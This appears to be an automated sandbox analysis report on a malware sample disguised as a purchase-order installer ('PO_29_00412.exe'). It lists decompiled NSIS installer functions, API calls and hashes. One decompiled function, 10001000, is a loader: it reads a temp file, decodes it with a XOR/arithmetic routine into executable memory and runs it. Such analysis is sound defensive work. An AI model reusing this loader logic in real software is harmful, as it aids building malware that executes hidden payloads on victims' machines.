                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00000000
                                                                            0x00406e1f
                                                                            0x00000000
                                                                            0x00406e1f
                                                                            0x00406e1d
                                                                            0x00406da3
                                                                            0x00406da6
                                                                            0x00406da8
                                                                            0x00406dab
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c95
                                                                            0x00406c95
                                                                            0x00406c99
                                                                            0x0040715f
                                                                            0x00000000
                                                                            0x0040715f
                                                                            0x00406c9f
                                                                            0x00406ca2
                                                                            0x00406ca5
                                                                            0x00406ca8
                                                                            0x00406caa
                                                                            0x00406caa
                                                                            0x00406caa
                                                                            0x00406cad
                                                                            0x00406cb0
                                                                            0x00406cb3
                                                                            0x00406cb6
                                                                            0x00406cb9
                                                                            0x00406cbc
                                                                            0x00406cbd
                                                                            0x00406cbf
                                                                            0x00406cbf
                                                                            0x00406cbf
                                                                            0x00406cc2
                                                                            0x00406cc5
                                                                            0x00406cc8
                                                                            0x00406ccb
                                                                            0x00406ccb
                                                                            0x00406ccb
                                                                            0x00406cce
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f12
                                                                            0x00406f12
                                                                            0x00406f12
                                                                            0x00406f16
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f1c
                                                                            0x00406f1f
                                                                            0x00406f22
                                                                            0x00406f25
                                                                            0x00406f27
                                                                            0x00406f27
                                                                            0x00406f27
                                                                            0x00406f2a
                                                                            0x00406f2d
                                                                            0x00406f30
                                                                            0x00406f33
                                                                            0x00406f36
                                                                            0x00406f39
                                                                            0x00406f3a
                                                                            0x00406f3c
                                                                            0x00406f3c
                                                                            0x00406f3c
                                                                            0x00406f3f
                                                                            0x00406f42
                                                                            0x00406f45
                                                                            0x00406f48
                                                                            0x00406f4b
                                                                            0x00406f4f
                                                                            0x00406f51
                                                                            0x00406f54
                                                                            0x00000000
                                                                            0x00406f56
                                                                            0x00000000
                                                                            0x00406f56
                                                                            0x00406f54
                                                                            0x00407189
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067b8

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 69107d409a21aceab355f2bdda7f7152adad7d75b4471f7616c4440fbc630a2e
                                                                            • Instruction ID: 6d311f2402807b87ac493386ce59d8e56409eb9bb3693b5a24021ea98ba03221
                                                                            • Opcode Fuzzy Hash: 69107d409a21aceab355f2bdda7f7152adad7d75b4471f7616c4440fbc630a2e
                                                                            • Instruction Fuzzy Hash: 3AF18571D04229CBDF28CFA8C8946ADBBB1FF44305F25816ED456BB281D3786A86CF45
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040659C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E0040659C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4225a0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4225a0;
			}




                                                                            0x004065a7
                                                                            0x004065b0
                                                                            0x00000000
                                                                            0x004065bd
                                                                            0x004065b3
                                                                            0x00000000

                                                                            APIs
                                                                            • FindFirstFileA.KERNELBASE(74B5FA90,004225A0,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,00405CF1,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,74B5FA90,?,74B5F560,00405A10,?,74B5FA90,74B5F560), ref: 004065A7
                                                                            • FindClose.KERNEL32(00000000), ref: 004065B3
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp, xrefs: 0040659C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp
                                                                            • API String ID: 2295610775-3316059076
                                                                            • Opcode ID: a8a8e6ca181c7703a692eace486e77433675a7c42b8a8fe2eb47bb99df7a0189
                                                                            • Instruction ID: f69e928bf0ac745f57f8f0961b1e49234d8ba52852923c3f30ba08d6865e50e3
                                                                            • Opcode Fuzzy Hash: a8a8e6ca181c7703a692eace486e77433675a7c42b8a8fe2eb47bb99df7a0189
                                                                            • Instruction Fuzzy Hash: 64D01231615130FBC3411B38BE0C84B7A5C9F093303619B36F466F12E4D7748D62869C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403A3B, Relevance: 51.0, APIs: 14, Strings: 15, Instructions: 215stringregistryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 96%
                                                                            			E00403A3B(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x424754;
				_t17 = E00406631(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x420d50;
					"1033" = 0x30;
					 *0x42b001 = 0x78;
					 *0x42b002 = 0;
					E0040610F(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420d50, 0);
					__eflags =  *0x420d50;
					if(__eflags == 0) {
						E0040610F(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x420d50, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					_t67 =  *_t17(); // executed
					E00406186("1033", _t67 & 0x0000ffff);
				}
				E00403D00(_t71, _t84);
				_t80 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x4247e0 =  *0x42475c & 0x00000020;
				 *0x4247fc = 0x10000;
				if(E00405CAE(_t84, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405CAE(_t92, _t80) == 0) {
						E004062BB(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x424740, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423f28 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403D00(_t71, __eflags);
							__eflags =  *0x424800;
							if( *0x424800 != 0) {
								_t28 = E00405421(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x423f0c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420d30, 5);
							_t34 = E004065C3("RichEd20");
							__eflags = _t34;
							if(_t34 == 0) {
								E004065C3("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x423ee0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423ee0);
								 *0x423f04 = _t81;
								RegisterClassA(0x423ee0);
							}
							_t36 =  *0x423f20; // 0x0
							_t39 = DialogBoxParamA( *0x424740, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DD8, 0);
							E0040398B(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x424740;
						 *0x423ee4 = E00401000;
						 *0x423ef0 =  *0x424740;
						 *0x423ef4 = _t25;
						 *0x423f04 = 0x40a210;
						if(RegisterClassA(0x423ee0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x420d30 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x424740, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x4236e0;
					E0040610F(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x424798, 0x4236e0, 0);
					_t57 =  *0x4236e0; // 0x75
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x4236e1;
						 *((char*)(E00405BEB(0x4236e1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00406228(_t80, E00405BC0(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C07(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}


























                                                                            0x00403a41
                                                                            0x00403a4a
                                                                            0x00403a51
                                                                            0x00403a53
                                                                            0x00403a67
                                                                            0x00403a79
                                                                            0x00403a80
                                                                            0x00403a87
                                                                            0x00403a8d
                                                                            0x00403a92
                                                                            0x00403a98
                                                                            0x00403aab
                                                                            0x00403aab
                                                                            0x00403ab6
                                                                            0x00403a55
                                                                            0x00403a55
                                                                            0x00403a60
                                                                            0x00403a60
                                                                            0x00403abb
                                                                            0x00403ac5
                                                                            0x00403ace
                                                                            0x00403ad3
                                                                            0x00403ae4
                                                                            0x00403b6b
                                                                            0x00403b73
                                                                            0x00403b7c
                                                                            0x00403b7c
                                                                            0x00403b92
                                                                            0x00403b98
                                                                            0x00403ba6
                                                                            0x00403c27
                                                                            0x00403c2f
                                                                            0x00403c39
                                                                            0x00403c3e
                                                                            0x00403c44
                                                                            0x00403cce
                                                                            0x00403cd3
                                                                            0x00403cd5
                                                                            0x00403cf1
                                                                            0x00000000
                                                                            0x00403cf1
                                                                            0x00403cd7
                                                                            0x00403cdd
                                                                            0x00403ce5
                                                                            0x00403ce5
                                                                            0x00000000
                                                                            0x00403cdd
                                                                            0x00403c52
                                                                            0x00403c5d
                                                                            0x00403c62
                                                                            0x00403c64
                                                                            0x00403c6b
                                                                            0x00403c6b
                                                                            0x00403c76
                                                                            0x00403c7e
                                                                            0x00403c80
                                                                            0x00403c82
                                                                            0x00403c8b
                                                                            0x00403c8e
                                                                            0x00403c94
                                                                            0x00403c94
                                                                            0x00403c9a
                                                                            0x00403cb3
                                                                            0x00403cc4
                                                                            0x00000000
                                                                            0x00403cc9
                                                                            0x00403c31
                                                                            0x00403c33
                                                                            0x00000000
                                                                            0x00403ba8
                                                                            0x00403ba8
                                                                            0x00403bb4
                                                                            0x00403bbe
                                                                            0x00403bc4
                                                                            0x00403bc9
                                                                            0x00403bd8
                                                                            0x00403cf6
                                                                            0x00403cf6
                                                                            0x00000000
                                                                            0x00403cf6
                                                                            0x00403be7
                                                                            0x00403c22
                                                                            0x00000000
                                                                            0x00403c22
                                                                            0x00403aea
                                                                            0x00403aea
                                                                            0x00403aed
                                                                            0x00403aef
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403af9
                                                                            0x00403b09
                                                                            0x00403b0e
                                                                            0x00403b15
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403b19
                                                                            0x00403b1b
                                                                            0x00403b28
                                                                            0x00403b28
                                                                            0x00403b30
                                                                            0x00403b36
                                                                            0x00403b5e
                                                                            0x00403b66
                                                                            0x00000000
                                                                            0x00403b48
                                                                            0x00403b49
                                                                            0x00403b52
                                                                            0x00403b58
                                                                            0x00403b59
                                                                            0x00000000
                                                                            0x00403b59
                                                                            0x00403b54
                                                                            0x00403b56
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403b56
                                                                            0x00403b36

                                                                            APIs
                                                                              • Part of subcall function 00406631: GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                                                                              • Part of subcall function 00406631: GetProcAddress.KERNEL32(00000000,?), ref: 0040665E
                                                                            • GetUserDefaultUILanguage.KERNELBASE(00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO_29_00412.exe" ,00000000), ref: 00403A55
                                                                              • Part of subcall function 00406186: wsprintfA.USER32 ref: 00406193
                                                                            • lstrcatA.KERNEL32(1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO_29_00412.exe" ,00000000), ref: 00403AB6
                                                                            • lstrlenA.KERNEL32(uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,74B5FA90), ref: 00403B2B
                                                                            • lstrcmpiA.KERNEL32(?,.exe,uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000), ref: 00403B3E
                                                                            • GetFileAttributesA.KERNEL32(uvlcopdlxoed), ref: 00403B49
                                                                            • LoadImageA.USER32 ref: 00403B92
                                                                            • RegisterClassA.USER32 ref: 00403BCF
                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403BE7
                                                                            • CreateWindowExA.USER32 ref: 00403C1C
                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403C52
                                                                            • GetClassInfoA.USER32 ref: 00403C7E
                                                                            • GetClassInfoA.USER32 ref: 00403C8B
                                                                            • RegisterClassA.USER32 ref: 00403C94
                                                                            • DialogBoxParamA.USER32 ref: 00403CB3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: "C:\Users\user\Desktop\PO_29_00412.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$PB$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$uvlcopdlxoed$>B
                                                                            • API String ID: 606308-1071721557
                                                                            • Opcode ID: 8cd03706bc3b4e3cd0d6d37f96b9a73a5a3b7a5ac7853bf60a8ad06bd9737550
                                                                            • Instruction ID: 0b0e7d8dfe967f47b98d7fa3c12120eb495d8fa8be153c65172cdb3e572a9271
                                                                            • Opcode Fuzzy Hash: 8cd03706bc3b4e3cd0d6d37f96b9a73a5a3b7a5ac7853bf60a8ad06bd9737550
                                                                            • Instruction Fuzzy Hash: A061C4702046046EE620AF65AD46F3B3A7CEB8574AF40443FF951B62D3CB7D99068A2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 10001000, Relevance: 40.4, APIs: 15, Strings: 8, Instructions: 107libraryloaderfileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 73%
                                                                            			E10001000() {
				long _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				short _v540;
				_Unknown_base(*)()* _t19;
				_Unknown_base(*)()* _t21;
				void* _t35;
				void* _t38;
				void* _t54;
				signed char _t55;
				void* _t57;
				long _t60;

				_v8 = 0;
				_v12 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "CreateFileW");
				_t19 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetTempPathW");
				_t21 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "lstrcatW");
				_v16 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetFileSize");
				_v20 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "ReadFile");
				GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "VirtualAlloc");
				 *_t19(0x103,  &_v540);
				 *_t21( &_v540, L"\\d4kvs9nrjol318");
				_t57 = CreateFileW( &_v540, 0x80000000, 7, 0, 3, 0x80, 0);
				_t60 = _v16(_t57, 0);
				_t35 = VirtualAlloc(0, _t60, 0x3000, 0x40); // executed
				_t54 = _t35;
				ReadFile(_t57, _t54, _t60,  &_v8, 0);
				_t55 = 0;
				if(_v8 > 0) {
					do {
						 *(_t54 + _t55) = ( !( !( !( !( *(_t54 + _t55)) + 0x00000033 ^ 0x000000b8) + 0x00000076 ^ _t55) + _t55) - 0x00000001 ^ 0x000000dd) - 4;
						_t55 = _t55 + 1;
					} while (_t55 < _v8);
				}
				_t38 =  *_t54(); // executed
				return _t38;
			}
















                                                                            0x1000101c
                                                                            0x10001038
                                                                            0x1000103e
                                                                            0x1000104f
                                                                            0x10001070
                                                                            0x10001086
                                                                            0x10001090
                                                                            0x100010a0
                                                                            0x100010ae
                                                                            0x100010cc
                                                                            0x100010db
                                                                            0x100010e0
                                                                            0x100010e4
                                                                            0x100010ed
                                                                            0x100010f0
                                                                            0x100010f5
                                                                            0x100010f7
                                                                            0x10001112
                                                                            0x10001115
                                                                            0x10001116
                                                                            0x100010f7
                                                                            0x1000111b
                                                                            0x10001123

                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,CreateFileW), ref: 10001023
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 1000102C
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetTempPathW), ref: 1000103B
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 1000103E
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,lstrcatW), ref: 1000104C
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 1000104F
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetFileSize), ref: 1000105D
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 10001064
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,ReadFile), ref: 10001073
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 1000107A
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,VirtualAlloc), ref: 10001089
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 10001090
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 100010C9
                                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 100010E0
                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 100010ED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.225563218.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.225558456.0000000010000000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.225567503.0000000010002000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc$File$AllocCreateReadVirtual
                                                                            • String ID: CreateFileW$GetFileSize$GetTempPathW$ReadFile$VirtualAlloc$\d4kvs9nrjol318$kernel32.dll$lstrcatW
                                                                            • API String ID: 1887441620-752504215
                                                                            • Opcode ID: 0e07ef358f5899740aafe0e188f1b8fb0f0716f1783a0e0f8889a33e87055fb1
                                                                            • Instruction ID: 871aee7c3325be15e527a6f0dbcceabda7762257cb5af09dcf94b6b9e1ec5da7
                                                                            • Opcode Fuzzy Hash: 0e07ef358f5899740aafe0e188f1b8fb0f0716f1783a0e0f8889a33e87055fb1
                                                                            • Instruction Fuzzy Hash: E5317871940318BAFB20A7F08C89FEF7B68DB04681F000556F344A7186DA789A46DBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402EF1, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 204memoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 96%
                                                                            			E00402EF1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				signed int _t102;
				signed int _t104;
				void* _t106;
				signed int _t107;
				signed int _t110;
				intOrPtr* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x424750 = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\PO_29_00412.exe", 0x400);
				_t106 = E00405DC1("C:\\Users\\hardz\\Desktop\\PO_29_00412.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return "Error launching installer";
				}
				E00406228("C:\\Users\\hardz\\Desktop", "C:\\Users\\hardz\\Desktop\\PO_29_00412.exe");
				E00406228(0x42c000, E00405C07("C:\\Users\\hardz\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				__eflags = _t54;
				 *0x41f908 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E00402E52(1);
					__eflags =  *0x424758 - _t94;
					if( *0x424758 == _t94) {
						goto L32;
					}
					__eflags = _v12 - _t94;
					if(_v12 == _t94) {
						L28:
						_t111 = GlobalAlloc(0x40, _v20);
						E00406756(0x40b870);
						E00405DF0( &_v300, "C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403419( *0x424758 + 0x1c);
							 *0x41f90c = _t65;
							 *0x41f900 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403192(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x424754 = _t111;
								 *0x42475c =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x424760 =  *0x424760 + 1;
									__eflags =  *0x424760;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
									__eflags = _t102;
								} while (_t102 != 0);
								_t71 =  *0x41f8fc; // 0x2ba3f
								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
								E00405D7C(0x424780, _t111 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L32;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403419( *0x41f8f8);
					_t77 = E00403403( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L32;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L32;
					}
					goto L28;
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x424758) & 0x00007e00) + 0x200;
						__eflags = _t110 - _t82;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						_t83 = E00403403(0x4178f8, _t107);
						__eflags = _t83;
						if(_t83 == 0) {
							E00402E52(1);
							L32:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x424758;
						if( *0x424758 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E52(0);
							}
							goto L20;
						}
						E00405D7C( &_v40, 0x4178f8, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t89;
						_t104 =  *0x41f8f8; // 0x2381e
						 *0x424800 =  *0x424800 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t110;
						 *0x424758 = _t104;
						if(_t92 > _t110) {
							goto L32;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v12 = _v12 + 1;
							_t110 = _t92 - 4;
							__eflags = _t107 - _t110;
							if(_t107 > _t110) {
								_t107 = _t110;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t110 -  *0x41f908; // 0x26073
						if(__eflags < 0) {
							_v8 = E004066E8(_v8, 0x4178f8, _t107);
						}
						 *0x41f8f8 =  *0x41f8f8 + _t107;
						_t110 = _t110 - _t107;
						__eflags = _t110;
					} while (_t110 != 0);
					_t94 = 0;
					__eflags = 0;
					goto L24;
				}
			}































                                                                            0x00402efc
                                                                            0x00402eff
                                                                            0x00402f02
                                                                            0x00402f1c
                                                                            0x00402f21
                                                                            0x00402f34
                                                                            0x00402f39
                                                                            0x00402f3f
                                                                            0x00000000
                                                                            0x00402f41
                                                                            0x00402f52
                                                                            0x00402f63
                                                                            0x00402f6a
                                                                            0x00402f70
                                                                            0x00402f72
                                                                            0x00402f77
                                                                            0x00402f79
                                                                            0x00403064
                                                                            0x00403066
                                                                            0x0040306b
                                                                            0x00403072
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403078
                                                                            0x0040307b
                                                                            0x004030a7
                                                                            0x004030b7
                                                                            0x004030b9
                                                                            0x004030ca
                                                                            0x004030e5
                                                                            0x004030eb
                                                                            0x004030ee
                                                                            0x004030f3
                                                                            0x00403112
                                                                            0x00403122
                                                                            0x00403134
                                                                            0x00403139
                                                                            0x0040313e
                                                                            0x00403141
                                                                            0x0040314a
                                                                            0x0040314e
                                                                            0x00403156
                                                                            0x0040315b
                                                                            0x0040315d
                                                                            0x0040315d
                                                                            0x0040315d
                                                                            0x00403165
                                                                            0x00403165
                                                                            0x00403168
                                                                            0x00403169
                                                                            0x00403169
                                                                            0x0040316c
                                                                            0x0040316e
                                                                            0x0040316e
                                                                            0x0040316e
                                                                            0x00403171
                                                                            0x00403178
                                                                            0x00403184
                                                                            0x00403189
                                                                            0x00000000
                                                                            0x00403189
                                                                            0x00000000
                                                                            0x00403141
                                                                            0x00000000
                                                                            0x004030f5
                                                                            0x00403083
                                                                            0x0040308e
                                                                            0x00403093
                                                                            0x00403095
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040309e
                                                                            0x004030a1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402f7f
